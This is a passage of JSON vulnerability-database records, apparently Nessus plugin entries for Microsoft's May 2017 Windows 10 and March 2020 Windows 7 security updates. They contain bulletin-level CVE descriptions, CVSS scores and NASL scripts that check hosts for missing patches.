"cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_MAY_4016871.NASL", "href": "https://www.tenable.com/plugins/nessus/100055", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100055);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0223\",\n \"CVE-2017-0224\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0235\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98214,\n 98217,\n 98222,\n 98229,\n 98230,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98452\n );\n script_xref(name:\"MSKB\", value:\"4016871\");\n script_xref(name:\"MSFT\", value:\"MS17-4016871\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4016871: Windows 10 Version 1703 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1703 host is missing security update\nKB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0235)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4016871/windows-10-update-kb4016871\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f546dcfb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4016871.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkbs = make_list(\n '4016871' # 10 1703 \n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1703)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4016871))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:28:45", "description": "The remote Windows host is missing security update 4541500 or cumulative update 4540688. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0849)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-03-24T00:00:00", "type": "nessus", "title": "KB4541500: Windows 7 and Windows Server 2008 R2 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0814", "CVE-2020-0822", "CVE-2020-0824", "CVE-2020-0830", "CVE-2020-0832", "CVE-2020-0833", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0860", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_MAR_4540688.NASL", "href": "https://www.tenable.com/plugins/nessus/134865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134865);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0814\",\n \"CVE-2020-0822\",\n \"CVE-2020-0824\",\n \"CVE-2020-0830\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0860\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\"\n );\n script_xref(name:\"MSKB\", value:\"4540688\");\n script_xref(name:\"MSKB\", value:\"4541500\");\n script_xref(name:\"MSFT\", value:\"MS20-4540688\");\n script_xref(name:\"MSFT\", value:\"MS20-4541500\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4541500: Windows 7 and Windows Server 2008 R2 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4541500\nor cumulative update 4540688. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the 